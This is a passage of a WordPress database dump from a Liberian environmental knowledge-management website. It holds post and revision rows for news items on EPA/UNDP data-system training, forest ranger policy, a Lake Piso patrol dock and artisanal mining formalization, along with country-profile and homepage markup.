its value at improving a more holistic and resilient construct of the selected sectoral plan in keeping with Rio Convention obligations, is among many others expected to provide understanding on what environmental knowledge is and how to validate data information and knowledge and as well as increase institutions\' benefits with an effective knowledge management strategy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The\ntraining would also focus on the typology of information and knowledge,\nidentification of information and knowledge needs, and the acquisition,\ndiscovery, storage, organization, sharing, use and application of information\nin the organizational context in digital environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Aaron\nWesseh, Head of the CCCD Project said the project is in line with the GEF-6\nCCCD strategy objectives 1, 3, and 5 which call for countries to integrate\nglobal environmental needs into management information systems and monitoring,\nintegrate Multilateral Environmental Agreements provisions into national\npolicy, legislative and regulatory frameworks and update National Capacity\nSelf-Assessment respectively.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Wesseh said at the opening of the training that the project will help Liberia to make better decisions to meet and sustain global environmental obligations including biodiversity, climate change, and desertification.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to\nhim, Liberia must have the capacity to coordinate efforts, as well as best\npractices for integrating global environmental priorities into planning,\ndecision-making, and reporting processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD Project, Mr. Wesseh noted, is being carried out via four linked components as means to achieve the goal and objective including the development of an integrated Environmental Knowledge Management System (EKMS), enhancement of institutional and technical capacities for mainstreaming, developing, and utilizing policies and or legislative frameworks for effective implementations of the three RIO Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Kolleh\nBangura, Chief Technical Adviser to the CCCD Project welcomed participants drawn\nfrom institutions involved with natural resource management and said the\nproject is being sponsored by the Global Environment Facility (GEF).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He applauded the CCCD Project Manager and the consultants for making the construction of the platform successful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Bangura\nhopes that the IT Specialists brought environmental data from their\ninstitutions to be loaded to the platform and stressed the need to have all\nenvironmental data in one place.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on behalf of EPA Deputy Director, Randall M. Dobayou, Tennema Coleman of Intersectorial thanked the participants and called on them to remain focus during the five-day. &nbsp; </p>\n<!-- /wp:paragraph -->\n\n<p><!--EndFragment--><br>\n<br>\n</p>','EPA, UNDP Built System To Hold Environmental Data','','inherit','closed','closed','','2801-revision-v1','','','2019-11-26 16:39:51','2019-11-26 16:39:51','',2801,'https://ekmsliberia.info/2801-revision-v1/',0,'revision','',0),(2804,1,'2019-11-26 16:52:42','2019-11-26 16:52:42','<!-- wp:paragraph -->\n<p> The Managing Director of the Forestry Development Authority (FDA) C. Mike Doryen has stressed the critical need to arm Liberia’s Forest Rangers like it is done in other countries to enable them to effectively fight wildlife and forest crime in Liberia. He said the arming of the forest rangers will help them become more vigorous in securing the forest especially at this time when the habits of poaching and illegal killing of wildlife have become the way of life for some ill-intent people, which he noted grossly undermines the work of the FDA. He made these and other resounding remarks on Wednesday July 17, 2019, at the program marking World Chimpanzee Day Celebration held at the Paynesville, Duport Road Park, Monrovia. He supported his statement by saying that the fight against forest crimes, like all others, remains a dangerous venture, and as such the government and conservation partners need to endorse the idea of arming the rangers is necessary to ensure the effective management of the forest. The MD said the arming of the rangers will practically strengthen the war against poaching and the illegal wildlife trade which has and continues to destroy the generation of wildlife. He praised the European Union for giving $1.5 Euro. to Liberia through the Wild Chimpanzee Foundation for use to fight forest-related crimes in Liberia. Last year a Confiscation Unit was created at the FDA to fight crime relating to illegal wildlife trade as well as other forest crimes. He also used the occasion to call for the creation of more job opportunities for young people in the forest sector in support of the youth empowerment program as dictated under the pro-poor agenda of the government.<br> For his part, the British Ambassador to Liberia David Belgrove said protected species of Liberia must be preserved while appreciating the government of Liberia through FDA management for the good work they are doing. He said his government recognizes the good work being done by the FDA and partners for protecting wildlife in Liberia in the forest sector.<br> Similarly, the Deputy German Ambassador, who proxied for the Ambassador of Germany to Liberia described chimpanzees as not just pets but relatives to mankind adding, “humans can’t live on earth without these animals and called for their maximum care at all times. The World Chimpanzee Day is celebrated on July 14 of every year internationally to create awareness on the protection of Chimpanzees and other protected species in the wild. </p>\n<!-- /wp:paragraph -->','FDA Boss Wants Forest Rangers Armed','','publish','open','open','','fda-boss-wants-forest-rangers-armed','','','2019-12-04 08:04:43','2019-12-04 08:04:43','',0,'https://ekmsliberia.info/?p=2804',210,'post','',0),(2806,1,'2019-11-26 16:50:54','2019-11-26 16:50:54','<!-- wp:paragraph -->\n<p> The Managing Director of the Forestry Development Authority (FDA) C. Mike Doryen has stressed the critical need to arm Liberia’s Forest Rangers like it is done in other countries to enable them to effectively fight wildlife and forest crime in Liberia. He said the arming of the forest rangers will help them become more vigorous in securing the forest especially at this time when the habits of poaching and illegal killing of wildlife have become the way of life for some ill-intent people, which he noted grossly undermines the work of the FDA. He made these and other resounding remarks on Wednesday July 17, 2019, at the program marking World Chimpanzee Day Celebration held at the Paynesville, Duport Road Park, Monrovia. He supported his statement by saying that the fight against forest crimes, like all others, remains a dangerous venture, and as such the government and conservation partners need to endorse the idea of arming the rangers is necessary to ensure the effective management of the forest. The MD said the arming of the rangers will practically strengthen the war against poaching and the illegal wildlife trade which has and continues to destroy the generation of wildlife. He praised the European Union for giving $1.5 Euro. to Liberia through the Wild Chimpanzee Foundation for use to fight forest-related crimes in Liberia. Last year a Confiscation Unit was created at the FDA to fight crime relating to illegal wildlife trade as well as other forest crimes. He also used the occasion to call for the creation of more job opportunities for young people in the forest sector in support of the youth empowerment program as dictated under the pro-poor agenda of the government.<br> For his part, the British Ambassador to Liberia David Belgrove said protected species of Liberia must be preserved while appreciating the government of Liberia through FDA management for the good work they are doing. He said his government recognizes the good work being done by the FDA and partners for protecting wildlife in Liberia in the forest sector.<br> Similarly, the Deputy German Ambassador, who proxied for the Ambassador of Germany to Liberia described chimpanzees as not just pets but relatives to mankind adding, “humans can’t live on earth without these animals and called for their maximum care at all times. The World Chimpanzee Day is celebrated on July 14 of every year internationally to create awareness on the protection of Chimpanzees and other protected species in the wild. </p>\n<!-- /wp:paragraph -->','FDA Boss Wants Forest Rangers Armed','','inherit','closed','closed','','2804-revision-v1','','','2019-11-26 16:50:54','2019-11-26 16:50:54','',2804,'https://ekmsliberia.info/2804-revision-v1/',0,'revision','',0),(2808,1,'2019-11-26 16:56:09','2019-11-26 16:56:09','<p><!--StartFragment--></p>\n\n<!-- wp:paragraph -->\n<p>The Environmental Protection Agency of Liberia (EPA) and the United Nations Development Program (UNDP) have built a platform to hold all environmental data and information aimed at enhancing Liberia’s development processes and have begun training information technology specialists from line government ministries and agencies about the system.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The Environmental Knowledge Management System (EKMS), which\nis yet to be launched is a multi-year, cross-sectoral engagement that supports\ncollaboration among Government staff, research centers, think tanks,\npractitioners, and private firms in tackling global environmental challenges.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>It was built under the Cross-Cutting Capacity Development (CCCD) Project which seeks to enable Liberia to make better decisions to meet and sustain global environmental obligations and strengthens a targeted set of national capacities to deliver and sustain global environmental outcomes within the framework of sustainable development priorities.&nbsp; </p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>However, the EPA and UNDP on Monday, 18 November 2019 began a five day ‘learning-by-doing training’ in Buchanan, Grand Bassa County to use the EKMS, to demonstrate its value at improving a more holistic and resilient construct of the selected sectoral plan in keeping with Rio Convention obligations, is among many others expected to provide understanding on what environmental knowledge is and how to validate data information and knowledge and as well as increase institutions\' benefits with an effective knowledge management strategy.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The\ntraining would also focus on the typology of information and knowledge,\nidentification of information and knowledge needs, and the acquisition,\ndiscovery, storage, organization, sharing, use and application of information\nin the organizational context in digital environment.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Aaron\nWesseh, Head of the CCCD Project said the project is in line with the GEF-6\nCCCD strategy objectives 1, 3, and 5 which call for countries to integrate\nglobal environmental needs into management information systems and monitoring,\nintegrate Multilateral Environmental Agreements provisions into national\npolicy, legislative and regulatory frameworks and update National Capacity\nSelf-Assessment respectively.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Wesseh said at the opening of the training that the project will help Liberia to make better decisions to meet and sustain global environmental obligations including biodiversity, climate change, and desertification.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>According to\nhim, Liberia must have the capacity to coordinate efforts, as well as best\npractices for integrating global environmental priorities into planning,\ndecision-making, and reporting processes.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>The CCCD Project, Mr. Wesseh noted, is being carried out via four linked components as means to achieve the goal and objective including the development of an integrated Environmental Knowledge Management System (EKMS), enhancement of institutional and technical capacities for mainstreaming, developing, and utilizing policies and or legislative frameworks for effective implementations of the three RIO Conventions.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Kolleh\nBangura, Chief Technical Adviser to the CCCD Project welcomed participants drawn\nfrom institutions involved with natural resource management and said the\nproject is being sponsored by the Global Environment Facility (GEF).</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>He applauded the CCCD Project Manager and the consultants for making the construction of the platform successful.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Dr. Bangura\nhopes that the IT Specialists brought environmental data from their\ninstitutions to be loaded to the platform and stressed the need to have all\nenvironmental data in one place.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>Speaking on behalf of EPA Deputy Director, Randall M. Dobayou, Tennema Coleman of Intersectorial thanked the participants and called on them to remain focus during the five-day. &nbsp; </p>\n<!-- /wp:paragraph -->\n\n<p><!--EndFragment--></p>','EPA, UNDP Built System To Hold Environmental Data','','inherit','closed','closed','','2801-revision-v1','','','2019-11-26 16:56:09','2019-11-26 16:56:09','',2801,'https://ekmsliberia.info/2801-revision-v1/',0,'revision','',0),(2809,1,'2019-11-26 17:04:55','2019-11-26 17:04:55','<!-- wp:paragraph -->\n<p> A joint team of FDA and GSA technicians working with Grand Cape Mount Local Authorities today selected a site to build a new dock where FDA’ s two patrol boats will be anchored to patrol Lake Piso and nearby islands to prevent illegal activities within the vicinity. The fully equipped boats will help with rescue missions when commercial boats are in danger. Thanks to our partners, Norway and the World Bank for the funding. Above is a photo of the boats. </p>\n<!-- /wp:paragraph -->','FDA to Build New Dock at Lake Piso','','publish','open','open','','fda-to-build-new-dock-at-lake-piso','','','2019-11-26 17:04:57','2019-11-26 17:04:57','',0,'https://ekmsliberia.info/?p=2809',209,'post','',0),(2810,1,'2019-11-26 17:04:12','2019-11-26 17:04:12','','FDA-MD','Boats funded by Norway and the World Bank.\n','inherit','open','closed','','fda-md','','','2019-11-26 17:04:42','2019-11-26 17:04:42','',2809,'https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg',0,'attachment','image/jpeg',0),(2811,1,'2019-11-26 17:04:55','2019-11-26 17:04:55','<!-- wp:paragraph -->\n<p> A joint team of FDA and GSA technicians working with Grand Cape Mount Local Authorities today selected a site to build a new dock where FDA’ s two patrol boats will be anchored to patrol Lake Piso and nearby islands to prevent illegal activities within the vicinity. The fully equipped boats will help with rescue missions when commercial boats are in danger. Thanks to our partners, Norway and the World Bank for the funding. Above is a photo of the boats. </p>\n<!-- /wp:paragraph -->','FDA to Build New Dock at Lake Piso','','inherit','closed','closed','','2809-revision-v1','','','2019-11-26 17:04:55','2019-11-26 17:04:55','',2809,'https://ekmsliberia.info/2809-revision-v1/',0,'revision','',0),(2813,1,'2019-11-26 17:12:36','2019-11-26 17:12:36','<!-- wp:paragraph -->\n<p>Recognizing the immense potential for the artisanal mining sector to generate national revenue and provide a sustained source of livelihood for over 100,000 gold and diamond miners in Liberia who depend on the sector for income, the Ministry of Mines and Energy has kick-started the process of formalizing the sector. The Regulatory Roadmap for Artisanal Mining in Liberia serves as a conceptual and technical strategy that outlines how the MME will implement Liberia’s Artisanal Mining Formalization.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To ensure that Artisanal Mining Formalization Program interventions address the real needs of mining stakeholders, the MME adopted a participatory and demand-driven approach to policy formulation, marking the beginning of an innovative and transparent dialogue between the Government of Liberia and artisanal mining stakeholders. Gathering extensive data from five mining pre-assessments (semi-structured baseline studies) and four county-level consultations with over 500 artisanal mining stakeholders from Bong; Lofa; Nimba; Grand Cape Mount; Bomi; Gbarpolu; Grand Bassa; Margibi; River Cess; Grand Gedeh; Grand Kru, River Gee, Maryland, Sinoe and Montserrado counties in November and December 2015, and in February and March 2016, MME has already begun formalizing the sector. Artisanal mining stakeholders have provided direct policy recommendations to the government to improve the sector, and these recommendations serve as the basis for the planned interventions described in this document.</p>\n<!-- /wp:paragraph -->','GIZ Partners With Ministry of Mines & Energy to Develop Artisinal Mining Regulatory Roadmap','','publish','open','open','','giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap','','','2019-11-26 17:12:38','2019-11-26 17:12:38','',0,'https://ekmsliberia.info/?p=2813',208,'post','',0),(2814,1,'2019-11-26 17:11:43','2019-11-26 17:11:43','','Illicit-mining','Artisanal Mining: Effects on Peace, Economy, Environment and Human Security\n','inherit','open','closed','','illicit-mining','','','2019-11-26 17:12:24','2019-11-26 17:12:24','',2813,'https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg',0,'attachment','image/jpeg',0),(2815,1,'2019-11-26 17:12:36','2019-11-26 17:12:36','<!-- wp:paragraph -->\n<p>Recognizing the immense potential for the artisanal mining sector to generate national revenue and provide a sustained source of livelihood for over 100,000 gold and diamond miners in Liberia who depend on the sector for income, the Ministry of Mines and Energy has kick-started the process of formalizing the sector. The Regulatory Roadmap for Artisanal Mining in Liberia serves as a conceptual and technical strategy that outlines how the MME will implement Liberia’s Artisanal Mining Formalization.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p>To ensure that Artisanal Mining Formalization Program interventions address the real needs of mining stakeholders, the MME adopted a participatory and demand-driven approach to policy formulation, marking the beginning of an innovative and transparent dialogue between the Government of Liberia and artisanal mining stakeholders. Gathering extensive data from five mining pre-assessments (semi-structured baseline studies) and four county-level consultations with over 500 artisanal mining stakeholders from Bong; Lofa; Nimba; Grand Cape Mount; Bomi; Gbarpolu; Grand Bassa; Margibi; River Cess; Grand Gedeh; Grand Kru, River Gee, Maryland, Sinoe and Montserrado counties in November and December 2015, and in February and March 2016, MME has already begun formalizing the sector. Artisanal mining stakeholders have provided direct policy recommendations to the government to improve the sector, and these recommendations serve as the basis for the planned interventions described in this document.</p>\n<!-- /wp:paragraph -->','GIZ Partners With Ministry of Mines & Energy to Develop Artisinal Mining Regulatory Roadmap','','inherit','closed','closed','','2813-revision-v1','','','2019-11-26 17:12:36','2019-11-26 17:12:36','',2813,'https://ekmsliberia.info/2813-revision-v1/',0,'revision','',0),(2816,1,'2019-11-27 01:29:29','2019-11-27 01:29:29','','News and Blogs','','inherit','closed','closed','','82-revision-v1','','','2019-11-27 01:29:29','2019-11-27 01:29:29','',82,'https://ekmsliberia.info/82-revision-v1/',0,'revision','',0),(2817,1,'2019-11-27 01:40:13','2019-11-27 01:40:13','','News-Blogs Sidebar','','publish','closed','closed','','news-blogs-sidebar','','','2019-11-27 01:40:13','2019-11-27 01:40:13','',0,'https://ekmsliberia.info/?post_type=sidebar&#038;p=2817',0,'sidebar','',0),(2818,1,'2019-11-27 01:39:54','2019-11-27 01:39:54','','','','publish','closed','closed','','2818','','','2019-11-27 01:39:54','2019-11-27 01:39:54','',2817,'https://ekmsliberia.info/?post_type=condition_group&#038;p=2818',1,'condition_group','',0),(2819,1,'2019-11-27 02:10:54','2019-11-27 02:10:54','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\" />											\n			<h2>Republic of Liberia</h2>		\n		<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia approximately 111,369 km2 and is the fifth smallest country in Africa.</p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005). The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km2 consist of water, and the remaining 96,319 km2 are land.</p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.</p><p>Liberia‘s Exclusive Economic Zone (EEZ) is 229,700 km2, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).</p>','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-27 02:10:54','2019-11-27 02:10:54','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(2821,1,'2019-11-27 02:15:32','2019-11-27 02:15:32','<img width=\"150\" height=\"150\" src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/seal-150x150.png\" alt=\"\" />											\n			<h2>Republic of Liberia</h2>		\n		<p>Liberia is a relatively small country located within the humid Upper Guinean Forest Ecosystem in West Africa on coast of the Atlantic Ocean. In terms of land area, Liberia approximately 111,369 km<sup>2</sup>, is the fifth smallest country in Africa.</p><p>The extreme southeast of the county is closer to the equator than any other coastal part of West Africa. It is closer to the South American Continent than any other African State, being about 1,600 km from Brazil (Wiles 2005). The country is located at latitudes 4°21‘N and 8°33‘ north of the equator and longitudes 11°28‘W and 7°32‘W. Within its borders, 15,050 km<sup>2</sup> consist of water, and the remaining 96,319 km<sup>2</sup> are land.</p><p>The perimeter of Liberia is 2,551 km (UNDP 2006), and it shares a border with three countries. Côte d‘Ivoire is to the east with a shared border length of 598 km; Sierra Leone is to the west with a shared border of 370 km; and Guinea is to the north with a shared border of 540 km (Wiles 2005).In the south Liberia is bordered by the North Atlantic Ocean,with a 350-mile (560 km) coastline stretching to Cape Palmas in the southeast on the border with Côte d‘Ivoire, and northwest beyond Robertsport to the Mano River on the border with Sierra Leone.</p><p>Liberia‘s Exclusive Economic Zone (EEZ) is 229,700 km<sup>2</sup>, extending 370.4 km (200 nautical mi) seaward from shore. The width of the continental shelf is generally limited by the 100 m isobaths, being wider off central Liberia (Wiles 2005). Four physiographic regions, corresponding largely to increasing elevation, are apparent in Liberia. All the physiographic regions are roughly parallel the coast (Gatter 1997).</p>','Country Profile','','inherit','closed','closed','','76-revision-v1','','','2019-11-27 02:15:32','2019-11-27 02:15:32','',76,'https://ekmsliberia.info/76-revision-v1/',0,'revision','',0),(2822,1,'2019-11-27 02:17:49','2019-11-27 02:17:49','','Contribute','','inherit','closed','closed','','74-revision-v1','','','2019-11-27 02:17:49','2019-11-27 02:17:49','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2824,1,'2019-11-27 02:23:04','2019-11-27 02:23:04','<h2>Contribute a knowledge resource to the EKMS</h2>','Contribute','','inherit','closed','closed','','74-revision-v1','','','2019-11-27 02:23:04','2019-11-27 02:23:04','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2825,1,'2019-11-27 02:25:39','2019-11-27 02:25:39','<h2>Contribute a knowledge resource to the EKMS</h2>','Contribute','','inherit','closed','closed','','74-revision-v1','','','2019-11-27 02:25:39','2019-11-27 02:25:39','',74,'https://ekmsliberia.info/74-revision-v1/',0,'revision','',0),(2827,1,'2019-11-27 10:05:28','2019-11-27 10:05:28','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n			<a href=\"https://ekmsliberia.info/blogs-news-and-stories/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 10:05:28','2019-11-27 10:05:28','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2829,1,'2019-11-27 10:19:12','2019-11-27 10:19:12','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a 